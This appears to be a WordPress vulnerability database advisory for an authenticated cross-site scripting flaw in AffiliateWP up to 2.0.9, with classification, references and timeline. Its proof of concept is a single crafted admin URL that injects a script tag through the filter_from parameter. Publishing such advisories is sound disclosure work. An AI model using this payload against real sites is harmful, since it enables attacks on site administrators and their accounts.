logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

AffiliateWP <= 2.0.9 - Authenticated Cross-Site Scripting (XSS)

Description

The AffiliateWP WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://vulnerablesite.com//wp-admin/admin.php?page=affiliate-wp-referrals&filter_from=%27%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E

Affects Plugins

AffiliateWP

Fixed in version 2.0.9.1

References

URL

https://www.defensecode.com/advisories/DC-2017-05-005_WordPress_AffiliateWP_Plugin_Advisory.pdf

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Submitter

Neven Biruski

Submitter website

http://www.defensecode.com

Submitter twitter

https://www.twitter.com/DefenseCode

Verified

No

WPVDB ID

e3ea30c6-eee6-409c-bd0a-ffd90dc94ac1

Timeline

Publicly Published

2017-05-24 (about 4 years ago)

Added

2017-05-26 (about 4 years ago)

Last Updated

2019-11-01 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin